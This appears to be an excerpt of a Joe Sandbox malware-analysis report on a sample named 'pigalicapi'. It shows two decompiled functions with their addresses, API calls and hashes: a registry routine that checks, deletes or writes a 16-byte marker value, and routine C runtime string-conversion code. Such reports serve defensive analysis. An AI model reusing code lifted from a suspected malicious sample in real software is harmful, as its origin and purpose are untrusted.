                                                                                                                                                                                                                                                                            • Instruction ID: 8fed4a07da5b50d804895129a8fb47a861ac909a584e64b04c6773c6ff26a7ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef91c748519bf4a509536674f74aef0b277bba7a60ac172d65429c5c71c59ae9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A412EB1E00209EBEB08DFD8DC45BEEBBB5EB48705F148059E605BB384D7759A40CBA4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01175E30(signed char _a4) {
                                                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				char* _v24;
                                                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                                                            				signed int _v29;
                                                                                                                                                                                                                                                                            				int _v36;
                                                                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                                                                            				int _v72;
                                                                                                                                                                                                                                                                            				char* _t31;
                                                                                                                                                                                                                                                                            				long _t33;
                                                                                                                                                                                                                                                                            				long _t37;
                                                                                                                                                                                                                                                                            				char* _t45;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v9 = 0;
                                                                                                                                                                                                                                                                            				_t31 =  *0x11818a0; // 0x1183b88
                                                                                                                                                                                                                                                                            				_v8 = _t31;
                                                                                                                                                                                                                                                                            				_t45 =  *0x1181894; // 0x1183fc4
                                                                                                                                                                                                                                                                            				_v24 = _t45;
                                                                                                                                                                                                                                                                            				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                            				if(( *0x118435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                                                            				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                                            				if(_t33 == 0) {
                                                                                                                                                                                                                                                                            					_v36 = 0x20;
                                                                                                                                                                                                                                                                            					_v28 = 0x20;
                                                                                                                                                                                                                                                                            					_v29 = 0;
                                                                                                                                                                                                                                                                            					_t37 = RegQueryValueExA(_v20, _v24, 0, 0,  &_v68,  &_v28); // executed
                                                                                                                                                                                                                                                                            					if(_t37 == 0 && _v28 == 0x10) {
                                                                                                                                                                                                                                                                            						_v29 = 1;
                                                                                                                                                                                                                                                                            						if((_a4 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            							RegDeleteValueA(_v20, _v24);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t48 = _v29 & 0x000000ff;
                                                                                                                                                                                                                                                                            					if((_v29 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						_v72 = 0x10;
                                                                                                                                                                                                                                                                            						E01179BD0(_t48,  &_v68, 0x10);
                                                                                                                                                                                                                                                                            						RegSetValueExA(_v20, _v24, 0, 3,  &_v68, 0x10);
                                                                                                                                                                                                                                                                            						_v9 = 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					RegCloseKey(_v20); // executed
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v9;
                                                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                                                            0x01175e36
                                                                                                                                                                                                                                                                            0x01175e3a
                                                                                                                                                                                                                                                                            0x01175e3f
                                                                                                                                                                                                                                                                            0x01175e42
                                                                                                                                                                                                                                                                            0x01175e48
                                                                                                                                                                                                                                                                            0x01175e4b
                                                                                                                                                                                                                                                                            0x01175e5b
                                                                                                                                                                                                                                                                            0x01175e5d
                                                                                                                                                                                                                                                                            0x01175e5d
                                                                                                                                                                                                                                                                            0x01175e64
                                                                                                                                                                                                                                                                            0x01175e7e
                                                                                                                                                                                                                                                                            0x01175e86
                                                                                                                                                                                                                                                                            0x01175e8c
                                                                                                                                                                                                                                                                            0x01175e93
                                                                                                                                                                                                                                                                            0x01175e9a
                                                                                                                                                                                                                                                                            0x01175eb2
                                                                                                                                                                                                                                                                            0x01175eba
                                                                                                                                                                                                                                                                            0x01175ec2
                                                                                                                                                                                                                                                                            0x01175ecc
                                                                                                                                                                                                                                                                            0x01175ed6
                                                                                                                                                                                                                                                                            0x01175ed6
                                                                                                                                                                                                                                                                            0x01175ecc
                                                                                                                                                                                                                                                                            0x01175edc
                                                                                                                                                                                                                                                                            0x01175ee2
                                                                                                                                                                                                                                                                            0x01175ee4
                                                                                                                                                                                                                                                                            0x01175ef1
                                                                                                                                                                                                                                                                            0x01175f0b
                                                                                                                                                                                                                                                                            0x01175f11
                                                                                                                                                                                                                                                                            0x01175f11
                                                                                                                                                                                                                                                                            0x01175f19
                                                                                                                                                                                                                                                                            0x01175f19
                                                                                                                                                                                                                                                                            0x01175f25

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 01175E7E
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 01175EB2
                                                                                                                                                                                                                                                                            • RegDeleteValueA.ADVAPI32(00000000,?), ref: 01175ED6
                                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 01175F0B
                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 01175F19
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                                                                                            • API String ID: 647993726-227171996
                                                                                                                                                                                                                                                                            • Opcode ID: 5ed2765a09f9382d3560a13d987594c8076690851faeca6d8b413de015cb11fd
                                                                                                                                                                                                                                                                            • Instruction ID: 5bd26b8493a7e39bbd033e8979d5893c433500f26b8aa24b03529fd57a938d77
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ed2765a09f9382d3560a13d987594c8076690851faeca6d8b413de015cb11fd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D318DB5A0021AAFEB19CFD4C855BFFBBB9BB05704F14841CEA10A7381D7B55A40CBA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                                                                            			E00C7CA49(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                                                            				int _t58;
                                                                                                                                                                                                                                                                            				signed int _t60;
                                                                                                                                                                                                                                                                            				short* _t62;
                                                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                                                            				short* _t70;
                                                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                                                            				int _t78;
                                                                                                                                                                                                                                                                            				short* _t81;
                                                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                                                            				signed int _t90;
                                                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                                                                            				int _t98;
                                                                                                                                                                                                                                                                            				short* _t101;
                                                                                                                                                                                                                                                                            				int _t103;
                                                                                                                                                                                                                                                                            				signed int _t106;
                                                                                                                                                                                                                                                                            				short* _t107;
                                                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                                                            				_t49 =  *0xd0db44; // 0xce6c4b51
                                                                                                                                                                                                                                                                            				_v8 = _t49 ^ _t106;
                                                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                                                            				_t103 = _a20;
                                                                                                                                                                                                                                                                            				if(_t103 > 0) {
                                                                                                                                                                                                                                                                            					_t78 = E00C7D97D(_a16, _t103);
                                                                                                                                                                                                                                                                            					_t110 = _t78 - _t103;
                                                                                                                                                                                                                                                                            					_t4 = _t78 + 1; // 0x1
                                                                                                                                                                                                                                                                            					_t103 = _t4;
                                                                                                                                                                                                                                                                            					if(_t110 >= 0) {
                                                                                                                                                                                                                                                                            						_t103 = _t78;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t98 = _a32;
                                                                                                                                                                                                                                                                            				if(_t98 == 0) {
                                                                                                                                                                                                                                                                            					_t98 =  *( *_a4 + 8);
                                                                                                                                                                                                                                                                            					_a32 = _t98;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                                                                                                                                                                                                                                            				_v12 = _t54;
                                                                                                                                                                                                                                                                            				if(_t54 == 0) {
                                                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                                                            					return E00C7DE3E(_v8 ^ _t106);
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t95 = _t54 + _t54;
                                                                                                                                                                                                                                                                            					_t85 = _t95 + 8;
                                                                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            					if((_t95 + 0x00000008 & _t54) == 0) {
                                                                                                                                                                                                                                                                            						_t81 = 0;
                                                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                                                            						if(_t81 == 0) {
                                                                                                                                                                                                                                                                            							L36:
                                                                                                                                                                                                                                                                            							_t105 = 0;
                                                                                                                                                                                                                                                                            							L37:
                                                                                                                                                                                                                                                                            							E00C7A83B(_t81);
                                                                                                                                                                                                                                                                            							goto L38;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                                                                                                                                                                                                                                            						_t121 = _t58;
                                                                                                                                                                                                                                                                            						if(_t58 == 0) {
                                                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t100 = _v12;
                                                                                                                                                                                                                                                                            						_t60 = E00C7AC09(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                            						_t105 = _t60;
                                                                                                                                                                                                                                                                            						if(_t105 == 0) {
                                                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if((_a12 & 0x00000400) == 0) {
                                                                                                                                                                                                                                                                            							_t96 = _t105 + _t105;
                                                                                                                                                                                                                                                                            							_t87 = _t96 + 8;
                                                                                                                                                                                                                                                                            							__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                                            							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            							__eflags = _t87 & _t60;
                                                                                                                                                                                                                                                                            							if((_t87 & _t60) == 0) {
                                                                                                                                                                                                                                                                            								_t101 = 0;
                                                                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                                                                            								L30:
                                                                                                                                                                                                                                                                            								__eflags = _t101;
                                                                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                                                                            									L35:
                                                                                                                                                                                                                                                                            									E00C7A83B(_t101);
                                                                                                                                                                                                                                                                            									goto L36;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t62 = E00C7AC09(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                                                                                                                                                                                                                                            								__eflags = _t62;
                                                                                                                                                                                                                                                                            								if(_t62 == 0) {
                                                                                                                                                                                                                                                                            									goto L35;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                                                            								__eflags = _a28;
                                                                                                                                                                                                                                                                            								if(_a28 != 0) {
                                                                                                                                                                                                                                                                            									_push(_a28);
                                                                                                                                                                                                                                                                            									_push(_a24);
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                                                                                                                                                                                                                                            								__eflags = _t105;
                                                                                                                                                                                                                                                                            								if(_t105 != 0) {
                                                                                                                                                                                                                                                                            									E00C7A83B(_t101);
                                                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									goto L35;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t90 = _t96 + 8;
                                                                                                                                                                                                                                                                            							__eflags = _t96 - _t90;
                                                                                                                                                                                                                                                                            							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            							_t66 = _t60 & _t90;
                                                                                                                                                                                                                                                                            							_t87 = _t96 + 8;
                                                                                                                                                                                                                                                                            							__eflags = _t66 - 0x400;
                                                                                                                                                                                                                                                                            							if(_t66 > 0x400) {
                                                                                                                                                                                                                                                                            								__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            								_t101 = E00C7BF3C(_t87, _t66 & _t87);
                                                                                                                                                                                                                                                                            								_pop(_t87);
                                                                                                                                                                                                                                                                            								__eflags = _t101;
                                                                                                                                                                                                                                                                            								if(_t101 == 0) {
                                                                                                                                                                                                                                                                            									goto L35;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								 *_t101 = 0xdddd;
                                                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                                                            								_t101 =  &(_t101[4]);
                                                                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                                            							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            							E00C7E490();
                                                                                                                                                                                                                                                                            							_t101 = _t107;
                                                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                                                            							if(_t101 == 0) {
                                                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							 *_t101 = 0xcccc;
                                                                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t70 = _a28;
                                                                                                                                                                                                                                                                            						if(_t70 == 0) {
                                                                                                                                                                                                                                                                            							goto L37;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t125 = _t105 - _t70;
                                                                                                                                                                                                                                                                            						if(_t105 > _t70) {
                                                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t71 = E00C7AC09(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                                                                                                                                                                                                                                            						_t105 = _t71;
                                                                                                                                                                                                                                                                            						if(_t71 != 0) {
                                                                                                                                                                                                                                                                            							goto L37;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            					_t72 = _t54 & _t95 + 0x00000008;
                                                                                                                                                                                                                                                                            					_t85 = _t95 + 8;
                                                                                                                                                                                                                                                                            					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                                                                                                                                                                                                                                            						__eflags = _t95 - _t85;
                                                                                                                                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            						_t81 = E00C7BF3C(_t85, _t72 & _t85);
                                                                                                                                                                                                                                                                            						_pop(_t85);
                                                                                                                                                                                                                                                                            						__eflags = _t81;
                                                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *_t81 = 0xdddd;
                                                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                                                            						_t81 =  &(_t81[4]);
                                                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            					E00C7E490();
                                                                                                                                                                                                                                                                            					_t81 = _t107;
                                                                                                                                                                                                                                                                            					if(_t81 == 0) {
                                                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *_t81 = 0xcccc;
                                                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                                                                            0x00c7ca4e
                                                                                                                                                                                                                                                                            0x00c7ca4f
                                                                                                                                                                                                                                                                            0x00c7ca50
                                                                                                                                                                                                                                                                            0x00c7ca57
                                                                                                                                                                                                                                                                            0x00c7ca5b
                                                                                                                                                                                                                                                                            0x00c7ca5c
                                                                                                                                                                                                                                                                            0x00c7ca62
                                                                                                                                                                                                                                                                            0x00c7ca68
                                                                                                                                                                                                                                                                            0x00c7ca6e
                                                                                                                                                                                                                                                                            0x00c7ca71
                                                                                                                                                                                                                                                                            0x00c7ca71
                                                                                                                                                                                                                                                                            0x00c7ca74
                                                                                                                                                                                                                                                                            0x00c7ca76
                                                                                                                                                                                                                                                                            0x00c7ca76
                                                                                                                                                                                                                                                                            0x00c7ca74
                                                                                                                                                                                                                                                                            0x00c7ca78
                                                                                                                                                                                                                                                                            0x00c7ca7d
                                                                                                                                                                                                                                                                            0x00c7ca84
                                                                                                                                                                                                                                                                            0x00c7ca87
                                                                                                                                                                                                                                                                            0x00c7ca87
                                                                                                                                                                                                                                                                            0x00c7caa3
                                                                                                                                                                                                                                                                            0x00c7caa9
                                                                                                                                                                                                                                                                            0x00c7caae
                                                                                                                                                                                                                                                                            0x00c7cc41
                                                                                                                                                                                                                                                                            0x00c7cc54
                                                                                                                                                                                                                                                                            0x00c7cab4
                                                                                                                                                                                                                                                                            0x00c7cab4
                                                                                                                                                                                                                                                                            0x00c7cab7
                                                                                                                                                                                                                                                                            0x00c7cabc
                                                                                                                                                                                                                                                                            0x00c7cac0
                                                                                                                                                                                                                                                                            0x00c7cb14
                                                                                                                                                                                                                                                                            0x00c7cb14
                                                                                                                                                                                                                                                                            0x00c7cb16
                                                                                                                                                                                                                                                                            0x00c7cb18
                                                                                                                                                                                                                                                                            0x00c7cc36
                                                                                                                                                                                                                                                                            0x00c7cc36
                                                                                                                                                                                                                                                                            0x00c7cc38
                                                                                                                                                                                                                                                                            0x00c7cc39
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cc3f
                                                                                                                                                                                                                                                                            0x00c7cb29
                                                                                                                                                                                                                                                                            0x00c7cb2f
                                                                                                                                                                                                                                                                            0x00c7cb31
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cb37
                                                                                                                                                                                                                                                                            0x00c7cb49
                                                                                                                                                                                                                                                                            0x00c7cb4e
                                                                                                                                                                                                                                                                            0x00c7cb52
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cb5f
                                                                                                                                                                                                                                                                            0x00c7cb99
                                                                                                                                                                                                                                                                            0x00c7cb9c
                                                                                                                                                                                                                                                                            0x00c7cb9f
                                                                                                                                                                                                                                                                            0x00c7cba1
                                                                                                                                                                                                                                                                            0x00c7cba3
                                                                                                                                                                                                                                                                            0x00c7cba5
                                                                                                                                                                                                                                                                            0x00c7cbf1
                                                                                                                                                                                                                                                                            0x00c7cbf1
                                                                                                                                                                                                                                                                            0x00c7cbf3
                                                                                                                                                                                                                                                                            0x00c7cbf3
                                                                                                                                                                                                                                                                            0x00c7cbf5
                                                                                                                                                                                                                                                                            0x00c7cc2f
                                                                                                                                                                                                                                                                            0x00c7cc30
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cc35
                                                                                                                                                                                                                                                                            0x00c7cc09
                                                                                                                                                                                                                                                                            0x00c7cc0e
                                                                                                                                                                                                                                                                            0x00c7cc10
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cc14
                                                                                                                                                                                                                                                                            0x00c7cc15
                                                                                                                                                                                                                                                                            0x00c7cc16
                                                                                                                                                                                                                                                                            0x00c7cc19
                                                                                                                                                                                                                                                                            0x00c7cc55
                                                                                                                                                                                                                                                                            0x00c7cc58
                                                                                                                                                                                                                                                                            0x00c7cc1b
                                                                                                                                                                                                                                                                            0x00c7cc1b
                                                                                                                                                                                                                                                                            0x00c7cc1c
                                                                                                                                                                                                                                                                            0x00c7cc1c
                                                                                                                                                                                                                                                                            0x00c7cc29
                                                                                                                                                                                                                                                                            0x00c7cc2b
                                                                                                                                                                                                                                                                            0x00c7cc2d
                                                                                                                                                                                                                                                                            0x00c7cc5e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cc2d
                                                                                                                                                                                                                                                                            0x00c7cba7
                                                                                                                                                                                                                                                                            0x00c7cbaa
                                                                                                                                                                                                                                                                            0x00c7cbac
                                                                                                                                                                                                                                                                            0x00c7cbae
                                                                                                                                                                                                                                                                            0x00c7cbb0
                                                                                                                                                                                                                                                                            0x00c7cbb3
                                                                                                                                                                                                                                                                            0x00c7cbb8
                                                                                                                                                                                                                                                                            0x00c7cbd3
                                                                                                                                                                                                                                                                            0x00c7cbd5
                                                                                                                                                                                                                                                                            0x00c7cbdf
                                                                                                                                                                                                                                                                            0x00c7cbe1
                                                                                                                                                                                                                                                                            0x00c7cbe2
                                                                                                                                                                                                                                                                            0x00c7cbe4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cbe6
                                                                                                                                                                                                                                                                            0x00c7cbec
                                                                                                                                                                                                                                                                            0x00c7cbec
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cbec
                                                                                                                                                                                                                                                                            0x00c7cbba
                                                                                                                                                                                                                                                                            0x00c7cbbc
                                                                                                                                                                                                                                                                            0x00c7cbc0
                                                                                                                                                                                                                                                                            0x00c7cbc5
                                                                                                                                                                                                                                                                            0x00c7cbc7
                                                                                                                                                                                                                                                                            0x00c7cbc9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cbcb
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cbcb
                                                                                                                                                                                                                                                                            0x00c7cb61
                                                                                                                                                                                                                                                                            0x00c7cb66
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cb6c
                                                                                                                                                                                                                                                                            0x00c7cb6e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cb85
                                                                                                                                                                                                                                                                            0x00c7cb8a
                                                                                                                                                                                                                                                                            0x00c7cb8e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cb94
                                                                                                                                                                                                                                                                            0x00c7cac7
                                                                                                                                                                                                                                                                            0x00c7cac9
                                                                                                                                                                                                                                                                            0x00c7cacb
                                                                                                                                                                                                                                                                            0x00c7cad3
                                                                                                                                                                                                                                                                            0x00c7caf2
                                                                                                                                                                                                                                                                            0x00c7caf4
                                                                                                                                                                                                                                                                            0x00c7cafe
                                                                                                                                                                                                                                                                            0x00c7cb00
                                                                                                                                                                                                                                                                            0x00c7cb01
                                                                                                                                                                                                                                                                            0x00c7cb03
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cb09
                                                                                                                                                                                                                                                                            0x00c7cb0f
                                                                                                                                                                                                                                                                            0x00c7cb0f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7cb0f
                                                                                                                                                                                                                                                                            0x00c7cad7
                                                                                                                                                                                                                                                                            0x00c7cadb
                                                                                                                                                                                                                                                                            0x00c7cae0
                                                                                                                                                                                                                                                                            0x00c7cae4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7caea
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7caea

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00C7CC9A,?,?,00000000), ref: 00C7CAA3
                                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00C7CADB
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00C7CC9A,?,?,00000000,?,?,?), ref: 00C7CB29
                                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00C7CBC0
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,00C7CC9A,?,?,00000000,?), ref: 00C7CC23
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C7CC30
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BF3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C7A7C2,00000000), ref: 00C7BF6E
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C7CC39
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C7CC5E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3864826663-0
                                                                                                                                                                                                                                                                            • Opcode ID: d34dc1d863f26d2402d596574e704976e9ec2023eaa7a873048764c9264a2191
                                                                                                                                                                                                                                                                            • Instruction ID: fb8c11f0553b362bf0361d7015511007e18410d789ad104bdb59a168031aafe5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d34dc1d863f26d2402d596574e704976e9ec2023eaa7a873048764c9264a2191
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4251D1B260021BAFDB268F65DC81EBF7BA9EB44750F15862DFC2CE6140EB34DD409661
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

